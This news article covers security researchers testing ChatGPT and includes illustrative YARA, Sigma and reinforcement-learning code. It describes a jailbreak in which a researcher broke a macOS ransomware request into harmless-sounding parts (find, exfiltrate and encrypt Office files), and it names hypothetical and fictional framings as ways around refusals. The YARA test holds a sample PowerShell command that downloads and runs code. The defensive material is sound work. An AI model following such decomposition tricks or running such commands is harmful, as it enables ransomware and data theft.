How ChatGPT is changing the way cybersecurity practitioners view the potential of AI

A new AI chatbot demonstrates surprising capabilities in offensive and defensive cybersecurity, while changing minds about the long-term potential of machine learning and AI-based systems. (Image credit: imaginima via Getty)

In some cybersecurity circles, it’s become a running joke over the years to mock the way AI and its capabilities are touted by vendors or LinkedIn thought leaders.

The bottom line is that while there are valuable tools and use cases for the technology – in cybersecurity as well as other areas – many solutions have proven to be overhyped by marketing teams and far less sophisticated or practical than advertised.

That’s part of why the response from information security professionals to ChatGPT over the past week has been so compelling. A community primed to be skeptical of modern AI has become obsessed with the real-world cybersecurity potential of a machine learning chatbot.

“It really influenced how I thought about the role of machine learning and AI in innovation,” said Casey John Ellis, CTO, founder and president of Bugcrowd, in an interview.

Ellis’ experience mirrors that of dozens of other cybersecurity researchers who, like much of the tech world, have spent the past week probing, prodding and testing ChatGPT for its depth, sophistication and capabilities. What they found could lend more weight to claims that artificial intelligence, or at least advanced machine learning programs, may be the kind of disruptive and game-changing technology long promised.

In a short time, security researchers were able to perform a number of offensive and defensive cybersecurity tasks, such as generating convincing or polished phishing emails, developing usable Yara rules, spotting buffer overflows in code, producing evasion code that could help attackers bypass threat detection, and even writing malware.
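
For a sense of what “usable Yara rules” means in practice, the sketch below shows how a defender might sanity-check a chatbot-drafted rule before deploying it. It assumes the yara-python bindings are installed (pip install yara-python), and both the rule text and the test samples are hypothetical illustrations, not actual ChatGPT output.

```python
import yara  # pip install yara-python

# A hypothetical generated rule: flag PowerShell download-and-execute one-liners.
RULE_SOURCE = r"""
rule suspicious_powershell_downloader
{
    meta:
        description = "Flags PowerShell download-and-execute one-liners"
    strings:
        $fetch1 = "Invoke-WebRequest" nocase
        $fetch2 = "DownloadString" nocase
        $exec = "IEX" nocase
    condition:
        ($fetch1 or $fetch2) and $exec
}
"""

# Compiling is a cheap first check: syntax errors in a generated rule fail here.
rules = yara.compile(source=RULE_SOURCE)

# Exercise the rule against one known-bad and one known-benign sample.
samples = {
    "malicious": b"powershell -c IEX (New-Object Net.WebClient).DownloadString('http://example.test/p')",
    "benign": b"Get-ChildItem C:\\Users | Sort-Object Name",
}

for label, sample in samples.items():
    matches = rules.match(data=sample)
    print(f"{label}: {[m.rule for m in matches]}")
```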

While ChatGPT’s settings prevent it from doing outright malicious things, like detailing how to build a bomb or writing malicious code, several researchers have found a way around these protections.

Dr. Suleyman Ozarslan, security researcher and co-founder of Picus Security, said he was able to get the program to perform a number of offensive and defensive cybersecurity tasks, including creating a World Cup-themed phishing email in “perfect English,” as well as generating both Sigma detection rules to spot cybersecurity anomalies and evasion code that can bypass detection rules.
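
Sigma rules like the ones Ozarslan generated are vendor-neutral YAML documents that get translated into SIEM queries. The minimal sketch below uses PyYAML to parse an illustrative rule and confirm the fields a Sigma backend would expect; the rule content is an invented example, not the researcher’s actual output.

```python
import yaml  # pip install pyyaml

# A hypothetical Sigma rule: certutil.exe being used to fetch a remote file.
SIGMA_RULE = r"""
title: Suspicious certutil Download
status: experimental
description: Illustrative example only
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\certutil.exe'
    CommandLine|contains: '-urlcache'
  condition: selection
level: medium
"""

rule = yaml.safe_load(SIGMA_RULE)

# A Sigma backend would reject the rule without these top-level fields.
for field in ("title", "logsource", "detection"):
    assert field in rule, f"missing required Sigma field: {field}"

print(rule["title"], "->", rule["detection"]["condition"])
```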

Most notably, Ozarslan successfully tricked the program into writing ransomware for macOS, despite specific terms of service that prohibit the practice.

“Because ChatGPT won’t directly write ransomware code, I described ransomware tactics, techniques and procedures without framing them as such. It’s like a 3D printer that won’t ‘print a gun,’ but will happily print a barrel, magazine, grip and trigger if you ask it to,” Ozarslan said in an email accompanying his research. “I told the AI that I wanted to write software in Swift, and that I wanted it to find all the Microsoft Office files on my MacBook and send those files over HTTPS to my web server. I also wanted it to encrypt all the Microsoft Office files on my MacBook and send me the private key to use for decryption.”

The prompt allowed the program to generate sample code without triggering a violation or generating a warning message to the user.

Screenshot of a prompt tricking ChatGPT into writing ransomware code, which is prohibited by the terms of service. (Image credit: Dr. Suleyman Ozarslan and Picus Security)

Researchers were able to leverage the program to unlock capabilities that could make life easier for both cybersecurity defenders and malicious hackers. The dual-use nature of the program has drawn comparisons to Cobalt Strike and Metasploit, which function as legitimate penetration testing and adversary simulation software while also ranking among the most popular tools real cybercriminals and malicious hacking groups use to compromise victim systems.

Although ChatGPT may end up presenting similar concerns, some argue this is a reality of most new innovations, and that while creators must do their best to close avenues of abuse, it is impossible to completely control or prevent bad actors from using new technologies for harmful purposes.

“Technology shakes things up, that’s its job. I think unintended consequences are part of that disruption,” said Ellis, who said he expects to see tools like ChatGPT used by bug bounty hunters and the threat actors they hunt over the next five to 10 years. “Ultimately it’s the vendor’s role to minimize these things, but you also have to be diligent.”

Real potential – and real limits – of ChatGPT

While the program has impressed, and many of the people interviewed by SC Media expressed the belief that it will at the very least lower the barrier to entry for a number of basic offensive and defensive hacking tasks, there are still real limitations to its output.

As mentioned, ChatGPT refuses to do downright unethical things like writing malicious code, teaching you how to build a bomb, or commenting on the inherent superiority of different races or genders.

However, these settings can often be circumvented by tricking or socially engineering the program: for example, asking it to treat the question as a hypothetical, or to answer a prompt from the perspective of a fictional malicious party. Yet even then, some of the answers tend to be shallow, merely mimicking what a convincing answer might look like to an uninformed observer.

“One of the disclaimers mentioned by OpenAI and ChatGPT: you have to be very careful about the problem of coherent nonsense,” said Jeff Pollard, vice president and principal analyst at Forrester, who has studied the program and its capabilities in the cybersecurity space. “It might sound logical, but it’s not right, it’s not factually correct, you can’t really follow it and do anything with it… It’s not like you can suddenly use it to write software if you don’t write software… you [still] need to know what you’re actually doing to take advantage of it.”

When it does generate code or malware, the output tends to be relatively simplistic or riddled with bugs.

Ellis called the emergence of ChatGPT an “oh shit” moment for the adversarial AI and machine learning field. The ability of several security researchers to find loopholes that circumvent the guardrails the program’s operators put in place to prevent abuse highlights how the capabilities of, and vulnerabilities around, emerging technologies can often outpace our ability to secure them, at least in the early stages.

“We’ve seen that with mobile [vulnerabilities] in 2015, with IoT around 2017 when Mirai happened. You have this type of rapid deployment of technology because it solves a problem, but at some point in the future people realize they’ve made security assumptions that aren’t sound,” Ellis said.

ChatGPT relies on what is known as reinforcement learning from human feedback. This means that the more it interacts with humans and user-generated prompts, the more it learns. It also means that the program, whether through user feedback or changes made by its operators, could eventually learn to recognize some of the tactics researchers have used to circumvent its ethical filters. But it’s also clear that the cybersecurity community in particular will continue to do what it does best: testing the safeguards systems have in place and finding the weak spots.
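
ChatGPT’s real training pipeline involves a learned reward model and policy optimization, but the basic dynamic described above, behavior that draws negative human feedback becoming less likely over time, can be illustrated with a toy bandit loop. Every name and reward value below is invented for illustration.

```python
import random

# Candidate behaviors and a stand-in for human raters; all values invented.
RESPONSES = ["refuse politely", "answer helpfully", "comply with jailbreak"]
FEEDBACK = {"refuse politely": 0.6, "answer helpfully": 1.0, "comply with jailbreak": -1.0}

scores = {r: 0.0 for r in RESPONSES}  # running average reward per behavior
counts = {r: 0 for r in RESPONSES}

random.seed(7)
for _ in range(1000):
    # Epsilon-greedy: usually exploit the best-rated behavior, sometimes explore.
    if random.random() < 0.1:
        choice = random.choice(RESPONSES)
    else:
        choice = max(RESPONSES, key=scores.get)
    reward = FEEDBACK[choice]  # the "human thumbs up/down"
    counts[choice] += 1
    scores[choice] += (reward - scores[choice]) / counts[choice]  # incremental mean

# Jailbreak compliance ends up with the lowest estimated value.
print(scores)
```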

“I think the super interesting point… there’s this aspect when you activate things like this and release them into the world… you quickly learn how terrible many human beings are,” Pollard said. “What I mean by that is that you also start to realize… that [cybersecurity professionals] find ways around controls, because our work is about people finding ways around controls.”

Some in the industry were less surprised by the applicability of engines like ChatGPT to cybersecurity. Toby Lewis, head of threat analysis at Darktrace, a cyber defense company that builds its core tools on a proprietary AI engine, told SC Media that he was impressed with some of the cyber capabilities of programs like ChatGPT.

“Absolutely, there are some examples of code generated by ChatGPT… the first response to that is that it’s interesting. It definitely lowers the barrier, at the very least, for someone starting out in this space,” Lewis said.

The ultimate potential of ChatGPT is being studied in real time. For every example of a user finding a new or interesting use case, there is another example of someone digging below the surface to expose the nascent engine’s shallowness and its inability to intuit the “right” answer the way a human mind would.

Even if these efforts eventually run up against the limits of the program, their long-term impact is already being felt in cybersecurity. Pollard said the emergence of ChatGPT has already helped better crystallize for him and other analysts how similar programs could be practically leveraged by companies for defensive cybersecurity work in the future.

“I think there’s an aspect to looking at what it’s doing now, and it’s not that hard to see a future where you could take a SOC analyst who maybe has less experience, hasn’t seen as much, and they have something like this sitting next to them that helps them communicate the information, maybe helps them understand it or contextualize it, maybe gives them some insight into what to do next,” he said.

Lewis said that even in the short time the program has been available to the public, he’s already noticed a softening of the cynicism that some of his cybersecurity colleagues have traditionally brought to discussions of AI in cybersecurity.

Although the emergence of ChatGPT could eventually lead to technologies or companies that compete with Darktrace, Lewis said it has also made it much easier to explain the value these technologies bring to the cybersecurity space.

“AI is often seen as one of those industry buzzwords that gets sprinkled on a fancy new product. ‘There’s AI, so it’s amazing,’ and I think it’s always hard to fight that,” Lewis said. “Making the use of AI more accessible, more entertaining perhaps, in a way where [security practitioners] can just play with it, means they’ll learn about it. And that means I can now talk to a security researcher… and suddenly a few say, ‘you know, I see where this can be really helpful.’”
